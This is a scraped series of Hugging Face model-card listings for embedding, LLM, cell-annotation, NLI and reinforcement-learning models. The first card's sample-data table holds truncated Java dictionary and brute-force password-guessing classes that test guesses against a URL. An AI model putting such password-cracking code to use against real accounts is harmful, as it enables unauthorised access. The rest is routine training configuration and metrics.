| <code>import java.io.*;<br>import java.net.*;<br>import java.util.*;<br><br><br>public class Dictionary<br>{<br> public static void main (String args[])<br> {<br> <br> <br> Calendar cal = Calendar.getInstance();<br> Date now=cal.getTime();<br> double startTime = now.getTime();<br><br> String password=getPassword(startTime);<br> System.out.println("The password is " + password);<br> }<br><br> public static String getPassword(double startTime)<br> {<br> String password="";<br> int requests=0;<br><br> try<br> {<br> <br> FileReader fRead = new FileReader("/usr/share/lib/dict/words");<br> BufferedReader buf = new BufferedReader(fRead);<br><br> password=buf.readLine();<br><br> while (password != null)<br> {<br> <br> if (password.length()<=3)<br> {<br> requests++;<br> if (testPassword(password, startTime, requests))<br> return password;<br> }<br><br> password = buf.readLine();<br><br> }<br> }<br> catch (IOException ioe)<br> {<br><br> }<br><br> return password;<br> }<br><br> private static boolean testPassword(String password, double startTime, int requests)<br> {<br> try<br> {<br> <br> <br> U...</code> | <code>import java.io.*;<br>import java.net.*;<br>import java.util.*;<br><br><br>public class BruteForce<br>{<br><br> public static void main(String args[])<br> {<br> <br> <br> Calendar cal = Calendar.getInstance();<br> Date now=cal.getTime();<br> double startTime = now.getTime();<br><br> String password=getPassword(startTime);<br> System.out.println("The password is " + password);<br> }<br><br> public static String getPassword(double startTime)<br> {<br> char first, second, third;<br> String password="";<br> int requests=0;<br><br> <br> for (int i=65; i<123; i++)<br> {<br> requests++;<br> first = (char) i;<br><br> password = first + "";<br><br> <br> if (testPassword(password, startTime, requests))<br> return password;<br><br> for (int j=65; j<123; j++)<br> {<br> requests++;<br> second = (char) j;<br><br> password = first + "" + second;<br><br> <br> if (testPassword(password, startTime, requests))<br> return password;<br><br> for (int k=65; k<123; k++)<br> {<br> requests++;<br> third = (char) k;<br><br> password = first + "" + second + "" + third;<br><br> <br> if (test...</code> | <code><br><br>import java.misc.BASE64Encoder;<br>import java.misc.BASE64Decoder;<br>import java.io.*;<br>import java.net.*;<br>import java.util.*;<br><br><br><br>public class Dictionary {<br> <br> public Dictionary(String url, String dictionaryFile) {<br> try{<br> this.url = url;<br> this.dictionaryPath = dictionaryFile;<br> InputStream fis = new FileInputStream(this.dictionaryPath);<br> dict = new BufferedReader(new InputStreamReader(fis));<br><br> }catch(IOException ioe){<br> System.out.println("Error opening dictionary file:\n" +ioe);<br> }<br> }<br><br><br> <br> private String url = null;<br> <br> private String dictionaryPath = null;<br> <br> private BufferedReader dict = null;<br> <br> private int attempts = 0;<br> <br> private int passwordSize = 3;<br> <br> public void setPasswordSize(int size){<br> this.passwordSize = size;<br> }<br> <br> public String getNextPassword()throws IOException{<br><br> String line = dict.readLine();<br><br> while(line!=null&&line.length()!=this.passwordSize )<br> line = dict.readLine();<br><br> return line;<br> }<br> <br> publ...</code> |
* Loss: [<code>CachedMultipleNegativesRankingLoss</code>](https://sbert.net/docs/package_reference/sentence_transformer/losses.html#cachedmultiplenegativesrankingloss) with these parameters:
```json
{
"scale": 20.0,
"similarity_fct": "cos_sim",
"mini_batch_size": 32,
"gather_across_devices": false
}
```
### Training Hyperparameters
#### Non-Default Hyperparameters
- `per_device_train_batch_size`: 16
- `learning_rate`: 2e-05
- `num_train_epochs`: 1
- `warmup_ratio`: 0.1
- `fp16`: True
- `batch_sampler`: no_duplicates
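As a rough, hedged sketch, these non-default values map onto training arguments along the following lines (the output directory and any unlisted settings are assumptions, not values from the original run):
```python
from sentence_transformers import SentenceTransformerTrainingArguments
from sentence_transformers.training_args import BatchSamplers

args = SentenceTransformerTrainingArguments(
    output_dir="output",  # assumption: not stated in this card
    per_device_train_batch_size=16,
    learning_rate=2e-5,
    num_train_epochs=1,
    warmup_ratio=0.1,
    fp16=True,
    batch_sampler=BatchSamplers.NO_DUPLICATES,
)
```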
#### All Hyperparameters
<details><summary>Click to expand</summary>
- `overwrite_output_dir`: False
- `do_predict`: False
- `eval_strategy`: no
- `prediction_loss_only`: True
- `per_device_train_batch_size`: 16
- `per_device_eval_batch_size`: 8
- `per_gpu_train_batch_size`: None
- `per_gpu_eval_batch_size`: None
- `gradient_accumulation_steps`: 1
- `eval_accumulation_steps`: None
- `torch_empty_cache_steps`: None
- `learning_rate`: 2e-05
- `weight_decay`: 0.0
- `adam_beta1`: 0.9
- `adam_beta2`: 0.999
- `adam_epsilon`: 1e-08
- `max_grad_norm`: 1.0
- `num_train_epochs`: 1
- `max_steps`: -1
- `lr_scheduler_type`: linear
- `lr_scheduler_kwargs`: {}
- `warmup_ratio`: 0.1
- `warmup_steps`: 0
- `log_level`: passive
- `log_level_replica`: warning
- `log_on_each_node`: True
- `logging_nan_inf_filter`: True
- `save_safetensors`: True
- `save_on_each_node`: False
- `save_only_model`: False
- `restore_callback_states_from_checkpoint`: False
- `no_cuda`: False
- `use_cpu`: False
- `use_mps_device`: False
- `seed`: 42
- `data_seed`: None
- `jit_mode_eval`: False
- `use_ipex`: False
- `bf16`: False
- `fp16`: True
- `fp16_opt_level`: O1
- `half_precision_backend`: auto
- `bf16_full_eval`: False
- `fp16_full_eval`: False
- `tf32`: None
- `local_rank`: 0
- `ddp_backend`: None
- `tpu_num_cores`: None
- `tpu_metrics_debug`: False
- `debug`: []
- `dataloader_drop_last`: False
- `dataloader_num_workers`: 0
- `dataloader_prefetch_factor`: None
- `past_index`: -1
- `disable_tqdm`: False
- `remove_unused_columns`: True
- `label_names`: None
- `load_best_model_at_end`: False
- `ignore_data_skip`: False
- `fsdp`: []
- `fsdp_min_num_params`: 0
- `fsdp_config`: {'min_num_params': 0, 'xla': False, 'xla_fsdp_v2': False, 'xla_fsdp_grad_ckpt': False}
- `fsdp_transformer_layer_cls_to_wrap`: None
- `accelerator_config`: {'split_batches': False, 'dispatch_batches': None, 'even_batches': True, 'use_seedable_sampler': True, 'non_blocking': False, 'gradient_accumulation_kwargs': None}
- `parallelism_config`: None
- `deepspeed`: None
- `label_smoothing_factor`: 0.0
- `optim`: adamw_torch_fused
- `optim_args`: None
- `adafactor`: False
- `group_by_length`: False
- `length_column_name`: length
- `ddp_find_unused_parameters`: None
- `ddp_bucket_cap_mb`: None
- `ddp_broadcast_buffers`: False
- `dataloader_pin_memory`: True
- `dataloader_persistent_workers`: False
- `skip_memory_metrics`: True
- `use_legacy_prediction_loop`: False
- `push_to_hub`: False
- `resume_from_checkpoint`: None
- `hub_model_id`: None
- `hub_strategy`: every_save
- `hub_private_repo`: None
- `hub_always_push`: False
- `hub_revision`: None
- `gradient_checkpointing`: False
- `gradient_checkpointing_kwargs`: None
- `include_inputs_for_metrics`: False
- `include_for_metrics`: []
- `eval_do_concat_batches`: True
- `fp16_backend`: auto
- `push_to_hub_model_id`: None
- `push_to_hub_organization`: None
- `mp_parameters`:
- `auto_find_batch_size`: False
- `full_determinism`: False
- `torchdynamo`: None
- `ray_scope`: last
- `ddp_timeout`: 1800
- `torch_compile`: False
- `torch_compile_backend`: None
- `torch_compile_mode`: None
- `include_tokens_per_second`: False
- `include_num_input_tokens_seen`: False
- `neftune_noise_alpha`: None
- `optim_target_modules`: None
- `batch_eval_metrics`: False
- `eval_on_start`: False
- `use_liger_kernel`: False
- `liger_kernel_config`: None
- `eval_use_gather_object`: False
- `average_tokens_across_devices`: False
- `prompts`: None
- `batch_sampler`: no_duplicates
- `multi_dataset_batch_sampler`: proportional
- `router_mapping`: {}
- `learning_rate_mapping`: {}
</details>
### Training Logs
| Epoch | Step | Training Loss |
|:------:|:----:|:-------------:|
| 0.0414 | 100 | 1.297 |
| 0.0827 | 200 | 0.3721 |
| 0.1241 | 300 | 0.3752 |
| 0.1655 | 400 | 0.3124 |
| 0.2069 | 500 | 0.3386 |
| 0.2482 | 600 | 0.3278 |
| 0.2896 | 700 | 0.3256 |
| 0.3310 | 800 | 0.318 |
| 0.3724 | 900 | 0.3164 |
| 0.4137 | 1000 | 0.3372 |
| 0.4551 | 1100 | 0.3126 |
| 0.4965 | 1200 | 0.3015 |
| 0.5379 | 1300 | 0.3224 |
| 0.5792 | 1400 | 0.3263 |
| 0.6206 | 1500 | 0.3165 |
| 0.6620 | 1600 | 0.3376 |
| 0.7034 | 1700 | 0.2949 |
| 0.7447 | 1800 | 0.304 |
| 0.7861 | 1900 | 0.3123 |
| 0.8275 | 2000 | 0.2829 |
| 0.8688 | 2100 | 0.2901 |
| 0.9102 | 2200 | 0.2973 |
| 0.9516 | 2300 | 0.3004 |
| 0.9930 | 2400 | 0.3657 |
### Framework Versions
- Python: 3.11.11
- Sentence Transformers: 5.1.1
- Transformers: 4.56.2
- PyTorch: 2.8.0.dev20250319+cu128
- Accelerate: 1.10.1
- Datasets: 4.1.1
- Tokenizers: 0.22.1
## Citation
### BibTeX
#### Sentence Transformers
```bibtex
@inproceedings{reimers-2019-sentence-bert,
title = "Sentence-BERT: Sentence Embeddings using Siamese BERT-Networks",
author = "Reimers, Nils and Gurevych, Iryna",
booktitle = "Proceedings of the 2019 Conference on Empirical Methods in Natural Language Processing",
month = "11",
year = "2019",
publisher = "Association for Computational Linguistics",
url = "https://arxiv.org/abs/1908.10084",
}
```
#### CachedMultipleNegativesRankingLoss
```bibtex
@misc{gao2021scaling,
title={Scaling Deep Contrastive Learning Batch Size under Memory Limited Setup},
author={Luyu Gao and Yunyi Zhang and Jiawei Han and Jamie Callan},
year={2021},
eprint={2101.06983},
archivePrefix={arXiv},
primaryClass={cs.LG}
}
```
<!--
## Glossary
*Clearly define terms in order to be accessible across audiences.*
-->
<!--
## Model Card Authors
*Lists the people who create the model card, providing recognition and accountability for the detailed work that goes into its construction.*
-->
<!--
## Model Card Contact
*Provides a way for people who have updates to the Model Card, suggestions, or questions, to contact the Model Card authors.*
-->
|
milliarderdol/blockassist
|
milliarderdol
| 2025-09-23T15:56:29Z | 0 | 0 | null |
[
"gensyn",
"blockassist",
"gensyn-blockassist",
"minecraft",
"roaring rough scorpion",
"arxiv:2504.07091",
"region:us"
] | null | 2025-09-10T13:37:09Z |
---
tags:
- gensyn
- blockassist
- gensyn-blockassist
- minecraft
- roaring rough scorpion
---
# Gensyn BlockAssist
Gensyn's BlockAssist is a distributed extension of the paper [AssistanceZero: Scalably Solving Assistance Games](https://arxiv.org/abs/2504.07091).
|
ahmedsleemtest/hadi-8b-ONE
|
ahmedsleemtest
| 2025-09-23T15:54:16Z | 0 | 0 |
transformers
|
[
"transformers",
"safetensors",
"llama",
"text-generation",
"text-generation-inference",
"unsloth",
"conversational",
"en",
"license:apache-2.0",
"autotrain_compatible",
"endpoints_compatible",
"region:us"
] |
text-generation
| 2025-09-23T15:44:13Z |
---
base_model: unsloth/deepseek-r1-distill-llama-8b-unsloth-bnb-4bit
tags:
- text-generation-inference
- transformers
- unsloth
- llama
license: apache-2.0
language:
- en
---
# Uploaded finetuned model
- **Developed by:** ahmedsleemtest
- **License:** apache-2.0
- **Finetuned from model:** unsloth/deepseek-r1-distill-llama-8b-unsloth-bnb-4bit
This Llama model was trained 2x faster with [Unsloth](https://github.com/unslothai/unsloth) and Hugging Face's TRL library.
[<img src="https://raw.githubusercontent.com/unslothai/unsloth/main/images/unsloth%20made%20with%20love.png" width="200"/>](https://github.com/unslothai/unsloth)
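A minimal loading sketch with 🤗 Transformers is shown below; it assumes the repository loads directly with `AutoModelForCausalLM`, and the generation settings are illustrative rather than taken from the training run.
```python
from transformers import AutoModelForCausalLM, AutoTokenizer

model_id = "ahmedsleemtest/hadi-8b-ONE"
tokenizer = AutoTokenizer.from_pretrained(model_id)
model = AutoModelForCausalLM.from_pretrained(model_id, device_map="auto")

# Build a chat-formatted prompt and generate a short reply.
messages = [{"role": "user", "content": "Hello, who are you?"}]
inputs = tokenizer.apply_chat_template(messages, add_generation_prompt=True, return_tensors="pt").to(model.device)
outputs = model.generate(inputs, max_new_tokens=128)
print(tokenizer.decode(outputs[0], skip_special_tokens=True))
```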
|
popV/Tabula_Sapiens2_Lung
|
popV
| 2025-09-23T15:51:26Z | 0 | 0 |
popV
|
[
"popV",
"joblib",
"biology",
"genomics",
"single-cell",
"anndata_version:0.12.2",
"scikit_learn_version:1.7.2",
"organism:Homo sapiens",
"python_version:3.12.8",
"tissue: lung",
"license:cc-by-4.0",
"region:us"
] | null | 2025-09-23T15:50:51Z |
---
library_name: popV
license: cc-by-4.0
tags:
- biology
- genomics
- single-cell
- anndata_version:0.12.2
- scikit_learn_version:1.7.2
- organism:Homo sapiens
- python_version:3.12.8
- popV
- 'tissue: lung'
---
Popular Vote (popV) model for automated cell type annotation of single-cell RNA-seq data. This repository provides pretrained models that can be plugged directly into your own analysis.
Follow our [tutorial](https://github.com/YosefLab/popV/blob/main/tabula_sapiens_tutorial.ipynb) to learn how to use the model for cell type annotation.
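As a minimal, hedged sketch, the pretrained files can be pulled from the Hub as shown below; the exact file layout and how popV consumes it are covered by the tutorial above, not by this snippet.
```python
from huggingface_hub import snapshot_download

# Download the pretrained expert models for this tissue to a local directory.
local_dir = snapshot_download(repo_id="popV/Tabula_Sapiens2_Lung")
print(local_dir)  # point the popV annotation workflow from the tutorial at this path
```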
# Model description
Tabula Sapiens is a benchmark, first-draft human cell atlas of over 1.1M cells from 28 organs of 24 normal human subjects. This work is the product of the Tabula Sapiens Consortium. Taking the organs from the same individual controls for genetic background, age, environment, and epigenetic effects, and allows detailed analysis and comparison of cell types that are shared between tissues.
**Link to CELLxGENE**:
Link to the [data](https://cellxgene.cziscience.com/e/0d2ee4ac-05ee-40b2-afb6-ebb584caa867.cxg/) in the CELLxGENE browser for interactive exploration of the data and download of the source data.
**Training Code URL**:
Not provided by uploader.
# Metrics
Below are accuracies for each expert classifier and for the ensemble model. The validation-set accuracies are computed on a random 10% subset of the data that was held out from training.
| Cell Type | N cells | celltypist | knn bbknn | knn harmony | knn on scvi | onclass | scanvi | svm | xgboost | Consensus Prediction |
| --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- |
| macrophage | 0 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 |
| pulmonary alveolar type 2 cell | 0 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 |
| capillary endothelial cell | 0 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 |
| basal cell | 0 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 |
| pulmonary alveolar type 1 cell | 0 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 |
| intermediate monocyte | 0 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 |
| CD4-positive, alpha-beta T cell | 0 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 |
| CD8-positive, alpha-beta T cell | 0 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 |
| endothelial cell of artery | 0 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 |
| club cell | 0 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 |
| classical monocyte | 0 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 |
| basophil | 0 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 |
| vein endothelial cell | 0 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 |
| lung ciliated cell | 0 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 |
| alveolar adventitial fibroblast | 0 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 |
| respiratory goblet cell | 0 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 |
| natural killer cell | 0 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 |
| pericyte | 0 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 |
| B cell | 0 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 |
| adventitial cell | 0 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 |
| non-classical monocyte | 0 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 |
| monocyte | 0 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 |
| neutrophil | 0 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 |
| endothelial cell of lymphatic vessel | 0 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 |
| bronchial smooth muscle cell | 0 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 |
| mature NK T cell | 0 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 |
| plasma cell | 0 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 |
| vascular associated smooth muscle cell | 0 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 |
| myeloid dendritic cell | 0 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 |
| pulmonary ionocyte | 0 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 |
| mesothelial cell | 0 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 |
| plasmacytoid dendritic cell | 0 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 |
| serous cell of epithelium of bronchus | 0 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 |
| mast cell | 0 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 |
The training accuracies below are computed on the data used for training.
| Cell Type | N cells | celltypist | knn bbknn | knn harmony | knn on scvi | onclass | scanvi | svm | xgboost | Consensus Prediction |
| --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- |
| macrophage | 14833 | 0.96 | 0.98 | 0.97 | 0.98 | 0.00 | 0.95 | 0.97 | 0.96 | 0.98 |
| pulmonary alveolar type 2 cell | 10436 | 0.97 | 0.97 | 0.98 | 0.98 | 0.00 | 0.95 | 0.97 | 0.97 | 0.98 |
| capillary endothelial cell | 6474 | 0.96 | 0.96 | 0.97 | 0.97 | 0.00 | 0.97 | 0.96 | 0.97 | 0.98 |
| basal cell | 3605 | 0.93 | 0.94 | 0.94 | 0.94 | 0.00 | 0.91 | 0.95 | 0.95 | 0.96 |
| pulmonary alveolar type 1 cell | 2824 | 0.96 | 0.98 | 0.96 | 0.97 | 0.00 | 0.98 | 0.98 | 0.97 | 0.98 |
| intermediate monocyte | 2493 | 0.61 | 0.68 | 0.75 | 0.74 | 0.00 | 0.73 | 0.83 | 0.88 | 0.83 |
| CD4-positive, alpha-beta T cell | 1903 | 0.87 | 0.89 | 0.87 | 0.89 | 0.00 | 0.89 | 0.90 | 0.92 | 0.92 |
| CD8-positive, alpha-beta T cell | 1717 | 0.86 | 0.87 | 0.85 | 0.86 | 0.00 | 0.87 | 0.87 | 0.90 | 0.90 |
| endothelial cell of artery | 1584 | 0.76 | 0.81 | 0.83 | 0.82 | 0.00 | 0.83 | 0.82 | 0.83 | 0.85 |
| club cell | 1578 | 0.81 | 0.84 | 0.89 | 0.87 | 0.00 | 0.76 | 0.86 | 0.86 | 0.89 |
| classical monocyte | 1428 | 0.59 | 0.61 | 0.66 | 0.65 | 0.00 | 0.74 | 0.83 | 0.93 | 0.82 |
| basophil | 1193 | 0.98 | 0.98 | 0.99 | 0.99 | 0.00 | 0.98 | 0.98 | 0.98 | 0.99 |
| vein endothelial cell | 1187 | 0.79 | 0.83 | 0.85 | 0.84 | 0.00 | 0.84 | 0.86 | 0.88 | 0.87 |
| lung ciliated cell | 1075 | 0.96 | 0.97 | 0.98 | 0.98 | 0.00 | 0.97 | 0.98 | 0.97 | 0.98 |
| alveolar adventitial fibroblast | 1002 | 0.88 | 0.86 | 0.86 | 0.90 | 0.00 | 0.94 | 0.97 | 0.96 | 0.95 |
| respiratory goblet cell | 937 | 0.83 | 0.87 | 0.87 | 0.85 | 0.00 | 0.76 | 0.88 | 0.88 | 0.90 |
| natural killer cell | 928 | 0.91 | 0.92 | 0.91 | 0.92 | 0.00 | 0.92 | 0.95 | 0.96 | 0.96 |
| pericyte | 681 | 0.81 | 0.89 | 0.92 | 0.92 | 0.00 | 0.94 | 0.97 | 0.97 | 0.97 |
| B cell | 596 | 0.97 | 0.96 | 0.97 | 0.97 | 0.00 | 0.98 | 0.99 | 0.99 | 0.99 |
| adventitial cell | 533 | 0.81 | 0.82 | 0.79 | 0.82 | 0.00 | 0.90 | 0.96 | 0.96 | 0.93 |
| non-classical monocyte | 469 | 0.26 | 0.12 | 0.24 | 0.17 | 0.00 | 0.38 | 0.72 | 0.79 | 0.63 |
| monocyte | 464 | 0.42 | 0.33 | 0.50 | 0.48 | 0.00 | 0.62 | 0.78 | 0.87 | 0.75 |
| neutrophil | 338 | 0.95 | 0.97 | 0.96 | 0.95 | 0.00 | 0.96 | 0.97 | 0.95 | 0.99 |
| endothelial cell of lymphatic vessel | 285 | 0.98 | 0.98 | 0.97 | 0.96 | 0.00 | 0.97 | 0.99 | 0.99 | 0.98 |
| bronchial smooth muscle cell | 201 | 0.52 | 0.59 | 0.67 | 0.58 | 0.00 | 0.79 | 0.93 | 0.95 | 0.92 |
| mature NK T cell | 146 | 0.35 | 0.19 | 0.38 | 0.33 | 0.00 | 0.64 | 0.80 | 0.88 | 0.86 |
| plasma cell | 139 | 0.75 | 0.85 | 0.89 | 0.95 | 0.00 | 0.94 | 0.96 | 0.95 | 0.94 |
| vascular associated smooth muscle cell | 113 | 0.44 | 0.63 | 0.74 | 0.61 | 0.00 | 0.84 | 0.94 | 0.96 | 0.93 |
| myeloid dendritic cell | 29 | 0.00 | 0.12 | 0.76 | 0.60 | 0.00 | 0.65 | 0.87 | 0.97 | 0.95 |
| pulmonary ionocyte | 23 | 0.00 | 0.89 | 0.88 | 0.67 | 0.00 | 0.71 | 0.92 | 0.90 | 0.96 |
| mesothelial cell | 17 | 0.36 | 0.71 | 0.74 | 0.77 | 0.00 | 0.47 | 0.85 | 0.87 | 0.74 |
| plasmacytoid dendritic cell | 15 | 0.97 | 0.00 | 1.00 | 0.94 | 0.00 | 0.65 | 1.00 | 1.00 | 1.00 |
| serous cell of epithelium of bronchus | 13 | 0.00 | 0.38 | 0.00 | 0.38 | 0.00 | 0.28 | 0.79 | 0.93 | 0.63 |
| mast cell | 3 | 0.00 | 0.00 | 0.00 | 0.00 | 0.00 | 0.30 | 1.00 | 0.75 | 0.80 |
# References
Tabula Sapiens reveals transcription factor expression, senescence effects, and sex-specific features in cell types from 28 human organs and tissues, The Tabula Sapiens Consortium; bioRxiv, doi: https://doi.org/10.1101/2024.12.03.626516
|
BFCmath/xlmr-vinli-finetune_finetuned
|
BFCmath
| 2025-09-23T15:49:37Z | 0 | 0 |
transformers
|
[
"transformers",
"safetensors",
"xlm-roberta",
"text-classification",
"generated_from_trainer",
"base_model:lyle49/xlmr-vinli-finetune",
"base_model:finetune:lyle49/xlmr-vinli-finetune",
"license:mit",
"autotrain_compatible",
"endpoints_compatible",
"region:us"
] |
text-classification
| 2025-09-23T14:58:15Z |
---
library_name: transformers
license: mit
base_model: lyle49/xlmr-vinli-finetune
tags:
- generated_from_trainer
metrics:
- accuracy
model-index:
- name: xlmr-vinli-finetune_finetuned
results: []
---
<!-- This model card has been generated automatically according to the information the Trainer had access to. You
should probably proofread and complete it, then remove this comment. -->
# xlmr-vinli-finetune_finetuned
This model is a fine-tuned version of [lyle49/xlmr-vinli-finetune](https://huggingface.co/lyle49/xlmr-vinli-finetune) on an unspecified dataset.
It achieves the following results on the evaluation set:
- Loss: 0.7057
- Accuracy: 0.7664
- F1 Macro: 0.7681
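The auto-generated card does not include a usage snippet; below is a minimal inference sketch (the task format and label names are assumptions, since the training dataset is not documented here).
```python
from transformers import pipeline

# Minimal sketch; the id2label mapping is not documented in this card
classifier = pipeline("text-classification", model="BFCmath/xlmr-vinli-finetune_finetuned")

# Single-sentence input
print(classifier("Thời tiết hôm nay rất đẹp."))

# If the task is sentence-pair NLI (as the ViNLI base-model name suggests), pass a premise/hypothesis pair instead
print(classifier({"text": "Trời đang mưa to.", "text_pair": "Bên ngoài trời khô ráo."}))
```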
## Model description
More information needed
## Intended uses & limitations
More information needed
## Training and evaluation data
More information needed
## Training procedure
### Training hyperparameters
The following hyperparameters were used during training:
- learning_rate: 2e-05
- train_batch_size: 32
- eval_batch_size: 32
- seed: 42
- optimizer: OptimizerNames.ADAMW_TORCH with betas=(0.9, 0.999) and epsilon=1e-08; no additional optimizer arguments
- lr_scheduler_type: linear
- lr_scheduler_warmup_steps: 100
- num_epochs: 20
### Training results
| Training Loss | Epoch | Step | Validation Loss | Accuracy | F1 Macro |
|:-------------:|:-----:|:----:|:---------------:|:--------:|:--------:|
| 0.7981 | 1.0 | 175 | 0.7080 | 0.7214 | 0.7243 |
| 0.6215 | 2.0 | 350 | 0.6871 | 0.7429 | 0.7403 |
| 0.499 | 3.0 | 525 | 0.7057 | 0.7664 | 0.7681 |
| 0.3883 | 4.0 | 700 | 0.7750 | 0.7529 | 0.7542 |
| 0.333 | 5.0 | 875 | 0.8505 | 0.7443 | 0.7439 |
### Framework versions
- Transformers 4.52.4
- Pytorch 2.6.0+cu124
- Datasets 3.6.0
- Tokenizers 0.21.2
|
gouki510/gemma2-2b-base-marged
|
gouki510
| 2025-09-23T15:49:31Z | 0 | 0 |
transformers
|
[
"transformers",
"safetensors",
"gemma2",
"text-generation",
"text-generation-inference",
"unsloth",
"conversational",
"en",
"base_model:unsloth/gemma-2-2b",
"base_model:finetune:unsloth/gemma-2-2b",
"license:apache-2.0",
"autotrain_compatible",
"endpoints_compatible",
"region:us"
] |
text-generation
| 2025-09-23T14:47:17Z |
---
base_model: unsloth/gemma-2-2b
tags:
- text-generation-inference
- transformers
- unsloth
- gemma2
license: apache-2.0
language:
- en
---
# Uploaded finetuned model
- **Developed by:** gouki510
- **License:** apache-2.0
- **Finetuned from model:** unsloth/gemma-2-2b
This gemma2 model was trained 2x faster with [Unsloth](https://github.com/unslothai/unsloth) and Huggingface's TRL library.
[<img src="https://raw.githubusercontent.com/unslothai/unsloth/main/images/unsloth%20made%20with%20love.png" width="200"/>](https://github.com/unslothai/unsloth)
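The card does not include an inference example; the sketch below loads the merged checkpoint as a standard causal LM (loading via `AutoModelForCausalLM` is an assumption based on the `gemma2` architecture tag).
```python
from transformers import AutoModelForCausalLM, AutoTokenizer

model_id = "gouki510/gemma2-2b-base-marged"
tokenizer = AutoTokenizer.from_pretrained(model_id)
model = AutoModelForCausalLM.from_pretrained(model_id, device_map="auto")

# Simple greedy completion from the base model
inputs = tokenizer("The capital of France is", return_tensors="pt").to(model.device)
outputs = model.generate(**inputs, max_new_tokens=32)
print(tokenizer.decode(outputs[0], skip_special_tokens=True))
```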
|
tstenborg/ppo-Pyramids
|
tstenborg
| 2025-09-23T15:47:59Z | 0 | 0 |
ml-agents
|
[
"ml-agents",
"tensorboard",
"onnx",
"Pyramids",
"deep-reinforcement-learning",
"reinforcement-learning",
"ML-Agents-Pyramids",
"region:us"
] |
reinforcement-learning
| 2025-09-23T15:43:35Z |
---
library_name: ml-agents
tags:
- Pyramids
- deep-reinforcement-learning
- reinforcement-learning
- ML-Agents-Pyramids
---
# **ppo** Agent playing **Pyramids**
This is a trained model of a **ppo** agent playing **Pyramids**
using the [Unity ML-Agents Library](https://github.com/Unity-Technologies/ml-agents).
## Usage (with ML-Agents)
The Documentation: https://unity-technologies.github.io/ml-agents/ML-Agents-Toolkit-Documentation/
We wrote a complete tutorial to learn to train your first agent using ML-Agents and publish it to the Hub:
- A *short tutorial* where you teach Huggy the Dog 🐶 to fetch the stick and then play with him directly in your
browser: https://huggingface.co/learn/deep-rl-course/unitbonus1/introduction
- A *longer tutorial* to understand how ML-Agents works:
https://huggingface.co/learn/deep-rl-course/unit5/introduction
### Resume the training
```bash
mlagents-learn <your_configuration_file_path.yaml> --run-id=<run_id> --resume
```
### Watch your Agent play
You can watch your agent **playing directly in your browser**
1. If the environment is part of ML-Agents official environments, go to https://huggingface.co/unity
2. Find your model_id: tstenborg/ppo-Pyramids
3. Select your *.nn /*.onnx file
4. Click on Watch the agent play 👀
|
aayush7511/cleaned_context_all_sentences
|
aayush7511
| 2025-09-23T15:45:22Z | 0 | 0 |
transformers
|
[
"transformers",
"safetensors",
"bert",
"text-classification",
"generated_from_trainer",
"base_model:google-bert/bert-base-uncased",
"base_model:finetune:google-bert/bert-base-uncased",
"license:apache-2.0",
"autotrain_compatible",
"endpoints_compatible",
"region:us"
] |
text-classification
| 2025-09-23T15:44:45Z |
---
library_name: transformers
license: apache-2.0
base_model: google-bert/bert-base-uncased
tags:
- generated_from_trainer
metrics:
- accuracy
- precision
- recall
model-index:
